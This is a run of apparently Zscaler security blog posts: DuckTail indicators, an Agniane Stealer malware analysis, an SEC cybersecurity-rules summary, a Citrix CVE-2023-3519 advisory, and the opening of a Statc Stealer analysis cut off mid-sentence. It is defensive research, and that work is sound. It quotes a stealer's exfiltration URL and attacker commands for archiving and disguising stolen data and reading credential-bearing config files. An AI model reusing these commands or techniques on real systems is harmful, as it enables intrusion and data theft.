Figure 18: Zscaler sandbox detection
In addition to sandbox detection, Zscaler’s multilayered cloud security platform detects indicators at various levels.
LNK.Downloader.Ducktail
Win32.Dropper.Ducktail
Win64.PWS.Ducktail
Win32.Downloader.Ducktail
Win32.PWS.Ducktail
MITRE ATT&CK TTP Mapping
ID
TACTIC
TECHNIQUE
T1204.001
User Execution: Malicious Link
User executes the shortcut .lnk file
T1204.002
User Execution: Malicious File
User executes the attached compressed/executable file
T1027.001
Obfuscated Files or Information: Binary Padding
Binary inflated in order to avoid sandboxing
T1036.005
Masquerading: Match Legitimate Name or Location
Drops malicious binaries into legitimate paths
T1057
Process Discovery
Checks for well known security software analysis tools
T1567.002
Exfiltration Over Web Service: Exfiltration to Cloud Storage
Telegram API used to exfiltrate user data
T1070.006
Indicator Removal: Timestomp
PE’s Timestamp header value are tampered
Indicators of Compromise (IOCs)
Fake sites set up by DuckTail threat actor
marketingagency[.]social
a1outreach[.]software
mangogroup[.]sale
la-roche-posay[.]click
li-ning[.]agency
li-ning[.]news
hrm[.]social
hrms[.]social
mccann[.]fyi
avalonorganics[.]work
li-ningagency[.]news
li-ningjod[.]news
ogilvy[.]social
narscosmetics[.]social
yodo1game[.]software
louisvuitton-social[.]news
luoisviitton[.]news
eucerin[.]work
guessinc[.]work
samsungagency[.]link
brandresource[.]social
recruiterofbrand[.]social
brandrecruitment[.]social
hrmmarketing[.]link
marketingmanager[.]social
recruitmentagency[.]social
marketing-project[.]social
nike-agency[.]link
recuiter[.]company
louisvuitton-agency[.]link
louisvuitton-agencyjod[.]live
mccann[.]expert
ogilvysocial[.]company
louisvuitton-hr[.]news
louisvuitton-jod[.]chat
hyundaimotorjob[.]social
hyundaimotor[.]social
hyundaimotorgroup[.]social
adplexity[.]site
adplexitydesk[.]tech
fbadsguide[.]tech
affiliateguide[.]tech
newguide[.]tech
businessmanagerads[.]tech
businessmanager-update[.]info
marketing-tool[.]info
connectads[.]agency
disruptiveadvertising[.]agency
impressionagency[.]co
themars[.]social
ommmarketing[.]agency
growmemarketing[.]agency
ommmarketing[.]digital
impressiondigitals[.]agency
impressiondigital[.]info
passions[.]agency
brandstyle[.]agency
brandstyle[.]digital
Appendix
Attacker-controlled Trello account
Figure 19: An attacker-controlled Trello account used to host the malicious files. Screenshot shows the activity log.
Wed, 30 Aug 2023 07:08:00 -0700Sudeep Singhhttps://www.zscaler.com/blogs/security-research/look-ducktailAgniane Stealer: Dark Web’s Crypto Threat
https://www.zscaler.com/blogs/security-research/agniane-stealer-dark-web-s-crypto-threat
Introduction
Agniane Stealer fraudulently takes credentials, system information, and session details from browsers, tokens, and file transferring tools. Agniane Stealer also heavily targets cryptocurrency extensions and wallets. Once it obtains the sensitive data, Agniane Stealer transfers that stolen data to command-and-control [C&C] servers, where threat actors can act upon the stolen information.
We believe Agniane Stealer belongs to the Malware-as-a-Service (MaaS) platform Cinoshi Project, which was discovered in early 20231, and much of its code infrastructure is modeled after the platform. Its close relationship to Cinoshi Project means Agniane Stealer has been available for sale on several dark web forums. The threat actors responsible for Agniane Stealer utilize packers to maintain and regularly update the malware’s functionality and evasions features.
Key Takeaways
Stealing Capabilities: Agniane Stealer is an information stealer that takes stored credentials from web browsers, Telegram sessions, Discord tokens, Steam, WinSCP, and Filezilla sessions. In addition, It saves a screenshot of the user’s desktop, quickly collecting OpenVPN profiles and system information.
Crypto Hungry: Agniane Stealer is a prolific cryptocurrency data exfiltrator with extensive support for nearly 70+ crypto extensions and 10+ crypto wallets.
Evasion Techniques: Agniane Stealer implements numerous methods to detect anti-analysis software like malware sandboxes, emulators, VirtualBox, and other analysis tools.
Availability: Agniane Stealer is part of Cinoshi Project - a MaaS that offers services and subscriptions on the dark web.
Agniane Stealer Promoted on Telegram
During our analysis, we found a Telegram channel promoting and selling Agniane Stealer. The Telegram channel owner posts consistently about feature lists, updates, and pricing. We speculate the owner of the Telegram channel is the malware author.
The following Agniane Stealer feature list was found on the Telegram channel:
“The stealer is written in C# It loads the libraries used; build weight is 419 KB.
Perfectly crypted by mass-crypters, such as EasyCrypter, exe2pack, PackLab and others.
Supports stealing passwords and cookies from browsers based on Chromium and Gecko.
Support for more than 70+ crypto extensions from browsers, as well as more than 10+ crypto wallets.
Collection of Telegram sessions, Discord tokens, Steam sessions, Winscp and Filezilla sessions.
Saving screenshots from all monitors with detailed information about them.
Collection of all information about the victim's computer.
Convenient filter for domains that are important to you; search in passwords and cookies of your domains and record the result.
Collection of all possible OpenVPN profiles.
Collecting a list of all installed applications on the computer.
The ability to prohibit the launch of the build on virtual computers, emulators (configurable on the panel).
Protection of your build from running on Virustotal, AnyRun and similar servers (configurable on the panel).
Protection against repeated logs, as well as protection against empty logs (configurable on the panel).
Collection of files from the user's desktop and documents (file extensions are configured on the panel).
Log collection is carried out in memory, without using a disk to store materials from the log”
The following information regarding price was also found:
“💎 The cost of our styler
Steeler monthly subscription — $50
Three-month subscription - $120 $150 (20% off)
Lifetime subscriptions are not for sale and never will be for sale!”
Relationship to Cinoshi Project
This screen indicates that Agniane Stealer is most likely part of the Cinoshi Project.
Figure 1: Project information indicating that Agniane Stealer is very likely part of the Cinoshi Project
Agniane Stealer User Interface
In the following section, we illustrate the web experience when interacting with Agniane Stealer on the dark web. The screens below are available through the same Telegram channel we mentioned above.
Builder Tab
Below, you can see the Builder tab showing builder information. With this tab, cyber criminals can build custom variants of Agniane Stealer.
Figure 2: Builder tab showing builder information
Home Tab
In the screenshot below, you can see the Agniane Stealer Home tab. The interface encourages you to follow the Telegram channel in case the domain is blocked. In addition, this screen indicates the status of the gate server.
Figure 3: Home tab showing instructions and status
Logs Tab
On this screen, you can see a list of victim logs from all around the world. The list includes details relevant to a threat actor like Passwords, Wallets, and Cookies.
Figure 4: Logs tab showing victim logs
Settings Tab
The Stealer settings section allows a threat actor using Agniane Stealer to configure settings in a way that facilitates their nefarious intentions. A threat actor can: disable logs, extend libraries, and even prevent the malware from running during security inspection and analysis using anti-analysis techniques.
Figure 5: Stealer settings in Settings tab
The Telegram notification settings screen shows you how to set up Telegram notifications on your system and it lists various custom variables that correspond to relevant stolen data: number of passwords in the log, username, etc.
Figure 6: Telegram notification settings in Settings tab
The fake-error settings option also functions as a form of protection for Agniane Stealer. Enabling fake error messages allows threat actors to remain undetected for longer periods of time.
Figure 7: Fake-error settings in Settings tab
Parsers Tab
This screen displays options to parse victim logs. A threat actor can use a Discord token or use a login pass (feature under development).
Figure 8: Parsers tab showing options
Technical Analysis
Agniane Stealer, like many other information stealers, is written in C#. Our team determined that the Agniane Stealer sample under analysis is the first version of the build and was not packed or obfuscated, but the latest version has undergone packing and obfuscation.
Upon execution, Agniane Stealer generates a random 32-bit string using the character set “A-Z0-9”. The generated random string is used as the sub-folder name, which is created in the %TEMP% folder. This is where the stolen data is kept.
After that, the Agniane Stealer extracts a C&C URL (“https[ : ]//central-cee-doja [.] ru/”) from a hardcoded Base64 string.
Anti-Analysis Techniques
Checks for debugger
The malware sample calls the CheckRemoteDebuggerPresent Windows API to check if it's being run in a debugger. If Agniane Stealer detects a debugger, then it will exit from memory and stop running, making debugging harder.
Verifies tick counts
Agniane Stealer uses an emulator program to record the initial tick count, proceeds to sleep, and upon awakening, measures the tick count once more. If the difference between the initial and final tick counts is less than 10L, the program returns True, exits from memory, and stops running.
Detects analysis tools
Agniane Stealer checks the memory for analysis tools. If it finds an analysis tool running, Agniane Stealer will exit. Our analysis uncovered the following analysis tools:
Processhacker
Netstat
Netmon
Tcpview
Wireshark
Filemon
Regmon
cain
Locates user’s system
Hosting providers employ various security measures for malware detection. It is in the interest of the threat actors to remain undetected. Thus, the future course of execution is determined based on the geolocation data retrieved from the server using the request hxxp[:]//ip-api[.]com/line/fields=hosting. If the victim’s machine belongs to a hosting provider, execution is terminated.
Obscures identity with legitimate DLL handles
Agniane Stealer tries to obtain the handle of several DLLs using the GetModuleHandle function.
If successful, Agniane Stealer uses the innocuous DLL handle to hide itself from potential discovery. The malware targets the following DLLs:
SbieDll
SxIn
Sf2snxhk
cmdvrt32
Identifies virtual machines
Agniane Stealer utilizes the WMI queries to detect whether it is running inside a virtual environment and terminates execution if True.
QUERY
DETAILS
Select * from Win32_ComputerSystem
If Manufacturer is Microsoft corporation and Model is VIRTUAL return True or if either Manufacturer contains vmware or Model is VirtualBox return True, and malware exits from memory.
SELECT * FROM Win32_VideoController
Retrieves information about video controllers (also known as graphics cards) on a Windows computer. Uses the GetPropertyValue method to compare names with VMware and VBox. If a match is found, then True is returned and Agniane Stealer quits execution.
Stealer Capabilities
Agniane Stealer possesses several form-grabbing capabilities. Let’s dive into those.
Sidesteps dependencies
Upon execution, Agniane Stealer, with a compact sample size, adeptly operates on both 32 and 64-bit systems, sidestepping any reliance on pre-existing dependencies.
Intriguingly, it dynamically retrieves a set of 5 DLLs from its C&C servers, leveraging legitimate third-party DLLs to enhance its functionalities and capabilities. It employs the following:
SQLite.dll
SQLite.EF6.dll
SQLite.Linq.dll
SQLite.Interop.dll(x86 & x64bit)
Steals from the following areas:
AREAS
DETAILS
Telegram and Steam Sessions
Steals user tokens for logged-in Discord and Steam sessions, and OpenVPN profiles; sends data to threat actors.
Tries to search Telegram software under the “\\AppData\\Roaming\\Telegram” directory. If found, Agniane Stealer steals Telegram Sessions and archives it.
Tries to locate the Telegram process. If found, the malware kills the process and grabs all the Telegram files except emojis and user_data. Then, Agniane Stealer archives all remaining directories.
Browser cookies
Agniane Stealer targets login data, history, and web data from the following browsers:
OperaGX
Chrome
Opera
FireFox
Vivaldi
Brave
Edge
Yandex
Chromium
Domains
Agniane Stealer tries to harvest login credentials and cookies from following domains:
VK.com
facebook.com
instagram.com
mail.ru
If any passwords are found in the domains listed above, then Agniane Stealer places them into the Important Detects.txt file and archives them.
SSH File Transfer Protocol
Agniane Stealer pilfers WinSCP to collect Hostname, username, and password from all sessions by traversing through Software\\Martin Prikryl\\WinSCP 2\\Sessions registry entry.
Filezilla FTP Software
Agniane Stealer reads FileZilla\\recentservers.xml and searches for the <server> tag. If available, then Agniane Stealer grabs Hostname, username, and password. If the XML path was not found, then Agniane Stealer logs that it was unable to find the FileZilla session.
Computer System
Agniane Stealer gets the external IP address of the victim's machine using https://ipwho.is/?output=xml.
In addition, Agniane Stealer collects victims Windows version using SELECT * FROM win32_operatingsystem. Then, it obtains the bit version of the machine using Windows Registry and checks the value. If the value matches, then it is x86 but if it doesn’t then that indicates a x64bit machine.
Uses WMI to collect
Installed Antiviruses: Collects all installed antivirus software with the WMI query Select * from AntivirusProduct.
GPUName: Using WMI query SELECT * FROM Win32_VideoController and GetEnumerator() method Compares with "VMware SVGA 3D"
CPU name: Using WMI query SELECT * FROM Win32_Processor tries to access the CPU name of the victim's machine.
Captures a screenshot
Agniane Stealer captures a screenshot of the victim’s desktop using Bitmap.
Checks RAM
By querying WMI to Select * From Win32_ComputerSystem, Agniane Stealer calculates RAM allocated to the victim's machine.
Exfiltrates data
Agniane Stealer enumerates the users Desktop and the Documents folder for the files with .txt,.doc,.mafile,.rdp, and .db extension. The discovered files are then copied to the previously created subfolder under the %TEMP% location.
Finds installed applications
Agniane Stealer collects all applications installed on the victim’s machine by querying the Registry Key SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall. Then, it stores that information in the Installed Apps.txt file, as you can see in the image below.
Figure 9: Example information collected by Agniane Stealer
Agniane Stealer keeps a record of its actions in a file named execution log.txt, which documents all the operations executed and associated information.
Exfiltrates crypto data
In addition to form-grabbing, Agniane Stealer also utilizes clipper qualities to exfiltrate cryptocurrency data.
Agniane Stealer is a prolific cryptocurrency data exfiltrator with extensive support for nearly 70+ crypto extensions and 10+ crypto wallets. See the Crypto Extension & Wallet table at the bottom of this blog for a complete list.
How it works
Agniane Stealer uploads all the exfiltrated data to:
hxxps[:]//central-cee-doja.ru/TEST.php?ownerid=REPLACEUSER1D&buildid=spriteuser&countp=2&countc=29&username=saturn&country=IN&ipaddr=XX.XX.XX.XX&BSSID=XXXXXX000806C1&countw=0&rndtoken=REPLACERANDOMSTR&domaindetects=0
After uploading the stolen data to a remote server, the Agniane Stealer removes its traces from the victim’s system by deleting the sub-folder.
We observed that the latest version of the Agniane Stealer uses ConfuserEx Protector. Also, the recent variant employs more obfuscation techniques when compared to the earlier version, which makes it harder for security modules to detect.
In the images below, Figure 10 is from the earlier version of Agniane Stealer where the code is human-readable, and Figure 11 is from the latest version of Agniane Stealer where the same code is obfuscated through ConfuserEx Protector. The Figure 12 is showing the de-obfuscated code.
Human-readable code
Figure 10: Human-readable Agniane Stealer sample code
Obfuscated code
Figure 11: Obfuscated Agniane Stealer code sample
Deobfuscated code
Figure 12: Deobfuscated Agniane Stealer code sample
C&C Communication
In the case of Agniane Stealer, threat actors are using a command-and-control (C&C) server to move and store stolen data. A C&C server is a system controlled by the cybercriminals who distribute stealer malware to take sensitive data that allows them to manage and control compromised devices remotely.
In the image below, you can see the:
POST Request
Host Name
ZIP file payload PK header indicates the transmission of an archive file
Figure 13: Data stolen by Agniane Stealer and sent to C&C server
From here, Agniane Stealer downloads the SQLite dependency DLL, which is shown in the image below.
Figure 14: SQLite dependency DLL files are downloaded
Conclusion
As a purchasable service on the dark web, Agniane Stealer is a formidable addition to the Cinoshi Project and its arsenal of malware. Agniane Stealer’s ability to discreetly gather credentials and cryptocurrency details, and transfer that stolen data to command-and-control (C&C) servers poses a significant threat in the cybersecurity landscape. Agniane Stealer looks for various types of anti-analysis software to avoid detection.
Threat actors are constantly selling new malware services on the dark web and adding features to MaaS platforms. Our insights from analyzing Agniane Stealer demonstrate the importance of staying alert, ongoing research, and monitoring.
The Zscaler ThreatLabz team continuously monitors for new threats and shares its findings with the wider community.
Zscaler Coverage
Zscaler's multilayered cloud security platform detects indicators at various levels. During the investigation of this campaign, Zscaler Sandbox played a crucial role in analyzing the behavior of various files. Zscaler ensured coverage for the payloads seen in these attacks via advanced threat signatures.
Figure 15: The Zscaler Cloud Sandbox successfully detected the malware.
To learn more about coverage, visit the Zscaler Sandbox webpage or Win32.PWS.Agniane in the Threat Library, where we list all threats and threat information.
Indicators of Compromise (IOCs)
Agniane Stealer indicators of compromise
MD5 HASH VALUES
DESCRIPTION
522101881b87ccda4d78fac30e951d19
Agniane Stealer
0d20e90382f881116201ac7c9298aab6
Agniane Stealer
a1b5e20b58d23b26f640f252ece0891b
Agniane Stealer
5C0F65523F7ECB773C599B59D5CC3578
Agniane Stealer
a2b20120a92c3de445b0b384a494ed39
Agniane Stealer
d811a57bc0e8b86b449277f9ffb50cc9
Agniane Stealer
b62ef0920a545f547d6cd3cd2abd60d2
Agniane Stealer
Central-cee-doja.ru
Host Name
Crypto Extensions & Wallets
Tronlink Extension
Browser Extensions
Nifty Wallet Extension
Metamask Wallet Extension
Math Wallet Extension
Coinbase Extension
BinanceChain Extension
Brave Wallet Extension
Guarda Wallet Extension
Equal Wallet Extension
BitApp Wallet Extension
iWallet Extension
Wombat Extension
Authenticator Extension
EOS Authenticator Extension
BrowserPass Extension
MYKI Extension
Splikity Extension
CommonKey Extension
Zoho Vault Extension
Norton Password Manager Extension
Avira Password Manager Extension
Trezor Password Manager Extension
MEW CX Extension
Coin98 Extension
NeoLine Extension
Terra Station Extension
Keplr Extension
Sollet Extension
ICONex Extension
KHC Extension
TezBox Extension
Byone Extension
OneKey Extension
Trust Wallet Extension
MetaWallet Extension
Exodus Extension
Jaxx Liberty Extension
Atomic Wallet Extension
Electrum Extension
Mycelium Extension
Coinomi Extension
GreenAddress Extension
Edge Extension
BRD Extension
Samourai Wallet Extension
Copay Extension
Bread Extension
Airbitz Extension
KeepKey Extension
Trezor Extension
Ledger Live Extension
Ledger Wallet Extension
Bitbox Extension
Digital Bitbox Extension
YubiKey Extension
Google Authenticator Extension
Microsoft Authenticator Extension
Authy Extension
Duo Mobile Extension
OTP Auth Extension
FreeOTP Extension
Aegis Authenticator Extension
LastPass Authenticator Extension
Dashlane Extension
Keeper Extension
RoboForm Extension
KeePass Extension
KeePassXC Extension
Bitwarden Extension
NordPass Extension
LastPass Extension
Zcash Client
Armory Client
Bytecoin Client
Jaxx Client
Exodus Client
Ethereum Client
Electrum Client
AtomicWallet Client
Guarda Client
Coinomi Client
References
*1 = Agniane Stealer was first discovered by @MalGamy12
Tue, 22 Aug 2023 17:20:04 -0700Mallikarjun Piddannavar https://www.zscaler.com/blogs/security-research/agniane-stealer-dark-web-s-crypto-threatThe Impact of the SEC’s New Cybersecurity Policies
https://www.zscaler.com/blogs/security-research/impact-sec-s-new-cybersecurity-policies
Introduction
The rapid advancement of technology has led to an increasing number of cybersecurity incidents that pose significant risks to organizations, their stakeholders, and the general public. Recognizing the importance of transparent and timely reporting of such incidents, the U.S. Securities and Exchange Commission (SEC) announced on July 26, 2023, that it has adopted final rules regarding cybersecurity disclosure requirements for public companies. These rules mandate the disclosure of material cybersecurity incidents and information related to cybersecurity risk management, strategy, and governance.
This technical blog post delves into the key aspects of these newly adopted rules and their implications for public companies.
Key Takeaways
- Timely incident reporting: New Item 1.05 of Form 8-K requires reporting of material cybersecurity incidents within four business days, promoting swift transparency. Failure to timely file will not impact Form S-3 eligibility.
- Limited reporting delay for security: Possible delay in disclosure for national security risks with U.S. Attorney General’s approval, up to 120 days with SEC consent.
- Comprehensive incident disclosures: Incomplete Form 8-K data requires acknowledgment and later amendment filing, reducing redundancy.
- Broadened incident definition: Final rules broaden “cybersecurity incident” to include related unauthorized events, for a more holistic view.
- Annual risk reporting (Form 10-K): Beginning with annual reports for fiscal years ending on or after December 15, 2023, Regulation S-K Item 106 mandates yearly reporting on cybersecurity risk, strategy, governance, board oversight - without mandatory disclosure of board members’ expertise.
- Foreign Private Issuers: The rules require comparable disclosures by foreign private issuers on Form 6-K for material cybersecurity incidents and on Form 20-F for cybersecurity risk management, strategy, and governance.
- Compliance timing: Effective 30 days post Federal Register publication. Timelines will vary according to the size of a company.
Form 8-K: Incident Reporting
The finalized rules introduce a crucial change in the disclosure process through the addition of Item 1.05 to Form 8-K. This new requirement necessitates the reporting of material cybersecurity incidents within four business days from the company’s determination that the incident is material (not the date of discovery of the incident). Although the scope of disclosure in Item 1.05 has been refined, some notable deviations from the proposed rules are evident.
Limited Delay in Reporting
In cases where the disclosure of cybersecurity incidents could potentially jeopardize national security or public safety, a delay in reporting is permissible. However, this delay is subject to the U.S. Attorney General’s determination and cannot extend beyond a specified period, generally capped at 120 days. Such extensions require the SEC’s approval through an exemptive order.
Updated Incident Disclosures
When the required information for the Item 1.05 Form 8-K disclosure is not yet ascertainable or unavailable at the time of filing, the company must acknowledge this fact in the Form 8-K and subsequently file an amendment within four business days after obtaining the missing information. Notably, subsequent periodic filings will not necessitate updates based on this information.
Aggregation of Incidents
The concept of aggregating cybersecurity incidents is a noteworthy change from the proposed rules. While the requirement to disclose individually immaterial incidents has been omitted, the final rules encompass a broader definition of a cybersecurity incident. According to the SEC Cybersecurity Risk Management, Strategy, Governance, and Incident Disclosure, this definition encompasses “a series of related unauthorized occurrences,” enabling a more comprehensive overview of the incident-related disclosures.
Form 10-K: Cybersecurity Risk Management, Strategy, and Governance
Building upon the proposed rules, the finalized rules introduce a new Item 106 to Regulation S-K. This mandates an annual reporting of specific cybersecurity aspects, including risk management, strategy, governance, and the board’s oversight of cybersecurity risks. However, a departure from the initial proposal is that the final rules do not require the disclosure of board members’ cybersecurity expertise.
Effective Date and Compliance Timing
Compliance timelines vary based on the type of disclosure and the size of the reporting company:
Companies, excluding smaller reporting companies, must comply with Item 1.05 of Form 8-K within 90 days of the adopting release’s publication or by December 18, 2023, whichever is later.
Smaller reporting companies are granted 270 days from the adopting release’s publication, or until June 24, 2024, to comply with Item 1.05 of Form 8-K.
For Item 106 of Regulation S-K, all companies must commence compliance with their annual reports for fiscal years ending on or after December 15, 2023.
Structured data requirements apply to all companies one year after the initial compliance date for the corresponding disclosure.
Conclusion
The SEC’s new cybersecurity rules mark a significant milestone in enhancing transparency and accountability in the face of growing cybersecurity threats. These rules mandate the timely reporting of material incidents and the provision of comprehensive information about cybersecurity risk management, strategy, and governance.
As companies prepare to comply with these regulations, the landscape of cybersecurity disclosure in the corporate world will undergo transformative changes by promoting informed stakeholders and robust risk management practices.
Fri, 18 Aug 2023 10:15:12 -0700Deepen Desaihttps://www.zscaler.com/blogs/security-research/impact-sec-s-new-cybersecurity-policiesSecurity Advisory: Remote Code Execution Vulnerability (CVE-2023-3519)
https://www.zscaler.com/blogs/security-research/security-advisory-remote-code-execution-vulnerability-cve-2023-3519
Introduction
On 18 July 2023, Citrix published a security advisory that addressed a critical vulnerability with CVSS score 9.8 for CVE-2023-3519 for RCE (Remote Code Execution) in NetScaler ADC (formerly known as Citrix ADC) and NetScaler Gateway (formerly known as Citrix Gateway).
This vulnerability created a lot of buzz in the last several days. Many reports claim that the vulnerability was being exploited as a zero-day attack in the wild as threat actors were dropping a web shell onto organization's critical infrastructure.
The advisory from Citrix also includes additional vulnerabilities affecting NetScaler users.
CVE-2023-3466 - A reflected Cross-Site Scripting (XSS) vulnerability which requires the victim to access an attacker-controlled link in the browser while being on a network with connectivity to the NSIP. NetScaler IP (NSIP) address is the IP address where you access the NetScaler for management purposes.
CVE-2023-3467 - A Privilege Escalation vulnerability that requires authenticated access to NSIP or SNIP with management interface access. A subnet IP address (SNIP) is a NetScaler owned IP address that is used by NetScaler to communicate with the servers.
Key Takeaways
New Vulnerability Discovered: A new vulnerability, CVE-2023-3519, has been discovered that impacts NetScaler ADC NetScaler Gateway applications.
Upgrade Your Application: If you see your ADC or Gateway version below, Zscaler strongly urges you to upgrade to a safe version.
NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.13
NetScaler ADC and NetScaler Gateway 13.0 before 13.0-91.13
NetScaler ADC 13.1-FIPS before 13.1-37.159
NetScaler ADC 12.1-FIPS before 12.1-55.297
NetScaler ADC 12.1-NDcPP before 12.1-55.297
Possible Execution/PoC
CVE-2023-3519 could allow an unauthenticated threat actor to trigger a stack buffer overflow in the NetScaler Packet Processing Engine (nsppe) process by sending a specially crafted HTTP GET request. Since the nsppe runs as root, successful exploitation would likely result in arbitrary code execution as the ‘root’.
This is an example of the HTTP request with GET method:
Figure 1: Example Packet Capture with shell code
A proof-of-concept (PoC) for CVE-2023-3519 in Citrix ADC can be found on GitHub.
Attack Chain
A threat actor can exploit CVE-2023-3519 by uploading files containing malicious web shells and scripts, allowing them to scan networks and extract sensitive information.
A server's configuration files contain encrypted passwords that can be viewed and decrypted by decryption keys that are available on the same server. Thus, making configuration files an obvious target for threat actors. By decrypting Active Directory credentials, a threat actor can retrieve a wide range of information, including:
details about users
computers
groups
subnets
organizational units
Figure 2: Attack chain of Citrix Gateway CVE-2023-3519 unauthenticated remote code execution
1. Initial Access - According to CISA, a threat actor can upload a TGZ File (a compressed archive created using GZIP) containing a generic web shell, discovery script, and setuid binary file on the Citrix's NetScaler Application Delivery Controller (ADC) application. Through the web shell, the threat actor can execute remote commands on the compromised system, establishing a reliable command and control channel.
2. Privilege Escalation - The uploaded TGZ file consists of a setuid binary file which is used by threat actors to exploit Elevation Control Mechanism and gain elevated permissions on a system.
3. Credential Access - A threat actor uses the NetScaler configuration files, located in /flash/nsconfig/keys/updated/* and /nsconfig/ns.conf, to find an encrypted password that can be decrypted by the key stored on the ADC application. Using these keys, the Active Directory credentials are decrypted from the configuration file.
4. Discovery - The threat actor uses the newly acquired, decrypted credentials to query the Active Directory for trusted domains, organization units (OU), computers, users, etc. within the network that can be exploited to move laterally or escalate privileges.
5. Collection - The threat actor uses the 'tarball' command to compress the collected data and uses 'openssl' to encrypt the data. The following command is used by the threat actor to collect the compromised data from the infected system:
tar -czvf - /var/tmp/all.txt | openssl des3 -salt -k <> -out /var/tmp/test.tar.gz
6. Defense Evasion - Exfiltrated, collected data can be uploaded as an image file to a web accessible path to bypass detection engines using this command:
cp /var/tmp/test.tar.gz /netscaler/ns_gui/vpn/medialogininit.png.
As per public reports, a segmented environment where ADC applications were deployed prevented the threat actors from discovering critical infrastructure. The threat actors attempted to:
Execute a subnet-wide curl command to identify what was accessible from within the network as well as potential lateral movement targets.
Verify outbound network connectivity with a ping command (ping -c 1 google.com).
Execute host commands for a subnet-wide DNS lookup.
Like the reports state, the threat actors also attempted to delete their artifacts. They deleted the authorization configuration file (/etc/auth.conf) to prevent configured users (e.g., admin) from logging in remotely (e.g., CLI). Normally, an organization would need to reboot into single user mode (which may have deleted artifacts from the device) to regain access to the ADC application. However, in this case, the victim used an a readily available SSH key to gain access into the appliance without rebooting.
The threat actor’s post-exploitation lateral movement attempts were also blocked by network-segmentation controls. The threat actors implanted a second web shell on the victim that they later removed. This was likely a PHP shell with proxying capability. The threat actors likely used this to attempt proxying SMB traffic to the DC (the victim observed SMB connections where the actors attempted to use the previously decrypted AD credential to authenticate with the DC from the ADC via a virtual machine). Firewall and account restrictions (only certain internal accounts could authenticate to the DC) blocked this activity.
Figure 3: Metasploit releases the exploit for CVE-2023-3519
Affected Products
The following supported versions of NetScaler ADC and NetScaler Gateway are affected by the vulnerabilities:
NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.13
NetScaler ADC and NetScaler Gateway 13.0 before 13.0-91.13
NetScaler ADC 13.1-FIPS before 13.1-37.159
NetScaler ADC 12.1-FIPS before 12.1-55.297
NetScaler ADC 12.1-NDcPP before 12.1-55.297
Mitigations
Zscaler has observed exploits of CVE-2023-3519 on unmitigated applications. Zscaler strongly urges affected customers of NetScaler ADC and NetScaler Gateway to install the relevant updated versions as soon as possible.
NetScaler ADC and NetScaler Gateway 13.1-49.13 and later releases
NetScaler ADC and NetScaler Gateway 13.0-91.13 and later releases of 13.0
NetScaler ADC 13.1-FIPS 13.1-37.159 and later releases of 13.1-FIPS
NetScaler ADC 12.1-FIPS 12.1-55.297 and later releases of 12.1-FIPS
NetScaler ADC 12.1-NDcPP 12.1-55.297 and later releases of 12.1-NDcPP
Zscaler Coverage
Zscaler’s ThreatLabZ team has deployed protection.
Zscaler Advanced Threat Protection:
App.Exploit.CVE-2023-3519
Zscaler Private Access Protection:
Remote Code Execution : 932100 (Remote Command Execution: Unix Command Injection basic coverage)
Remote Code Execution : 932200 (RCE Bypass Technique)
PHP Injection : 933100 (PHP Injection Attack: PHP Open Tag Found)
We will update this article as information becomes available or if additional protection is put in place by Zscaler.
Resources
Citrix ADC and Citrix Gateway Security Bulletin for CVE-2023-3519, CVE-2023-3466, CVE-2023-346
Threat Actors Exploiting Citrix CVE-2023-3519 to Implant Webshells | CISA
GitHub - BishopFox/CVE-2023-3519: RCE exploit for CVE-2023-3519
Hundreds of Citrix NetScaler ADC and Gateway Servers Hacked in Major Cyber Attack (thehackernews.com)
https://nvd.nist.gov/vuln/detail/CVE-2023-3519
https://blog.assetnote.io/2023/07/24/citrix-rce-part-2-cve-2023-3519/
Tue, 08 Aug 2023 19:59:10 -0700Vishal Sangolekarhttps://www.zscaler.com/blogs/security-research/security-advisory-remote-code-execution-vulnerability-cve-2023-3519Statc Stealer: Decoding the Elusive Malware Threat
https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat
IntroductionRecently, while tracking global threat activity, the Zscaler ThreatLabz team discovered a new information stealer family called: Statc Stealer. Statc Stealer is a sophisticated malware that infects devices powered by Windows, gains access to computer systems, and steals sensitive information.In this comprehensive technical blog post, we unravel the intricate workings of Statc Stealer. By understanding its distribution methods and evasion techniques, we aim to equip you with the knowledge to secure your data against Statc Stealer. Key TakeawaysStealing Capabilities: Statc Stealer exhibits a broad range of stealing capabilities, making it a significant threat. It can steal sensitive information from various web browsers, including login data, cookies, web data, and preferences. Additionally, it targets cryptocurrency wallets, credentials, passwords, and even data from messaging apps like Telegram.Code and Evasion: The stealer utilizes C++ code, a common programming language for malware development. The stealer performs filename discrepancy checks to inhibit sandbox detection and reverse engineering analysis by researchers.Architecture and Ideal Target: Statc Stealer targets Windows operating systems and predominantly focuses on browsers used on Windows devices for stealing sensitive information.Encryption for Stealth: The malware leverages HTTPS encryption to hide its activities. Statc Stealer uses HTTPS protocol to send stolen, encrypted data to the command-and-control (C&C) server.Potential For HarmThe Zscaler ThreatLabz team recently discovered Statc Stealer. This malicious software gains access to a victim’s data by appearing like an authentic Google advertisement. Once the victim clicks on the advertisement, their operating system is infected with malicious code that steals sensitive data like credentials from web browsers, credit card information, and cryptocurrency wallet details. Unauthorized access to a victim’s computer system can have enormous personal and professional repercussions. Victims become easy targets for identity theft, cryptojacking, and other forms of malware attacks. At the enterprise level, a Statc Stealer breach can result in financial loss, reputational damage, legal liabilities, and regulatory penalties.Technical DetailsStatc Stealer gets started with an initial dropper. The initial dropper drops a decoy PDF installer and a downloader binary file. Then, the downloader binary file further downloads Statc Stealer using a PowerShell script. At a glance, both of these malicious files appear like legitimate software. However, once Statc Stealer is able to infect the victim’s device, it begins to steal data, encrypt it, and send it to its command-and-control (C&C) server. In addition, Statc Stealer utilizes evasion techniques to thwart attempts at reverse engineering the malware, making it harder to detect.Attack Chain Statc Stealer follows an attack chain that leverages malvertising to disseminate malicious files. The attack chain begins with an innocuous-looking advertisement within the victim's Google Chrome browser. Clicking on the malicious link results in downloading the Statc Stealer’s initial sample file, kicking off the malware infection. The attack chain operates as follows:A user is tricked into clicking on a malicious link somewhere on their Google Chrome browser (typically an advertisement).The user inadvertently downloads the Initial Sample file. After the malicious file executes, the Initial Sample drops and executes a Decoy PDF Installer. To facilitate the download of the Statc payload through a PowerShell script, the Initial Sample file also drops and executes a Downloader Binary file.Once Statc Stealer steals the user’s data, it encrypts the data, puts it in a text file, and stores it in the Temp folder.From here, Statc Stealer calls on its C&C server to deliver the stolen encrypted data.Figure 1: Statc Stealer attack chainInitial Sample URLThe URL below is malicious and shows where the initial 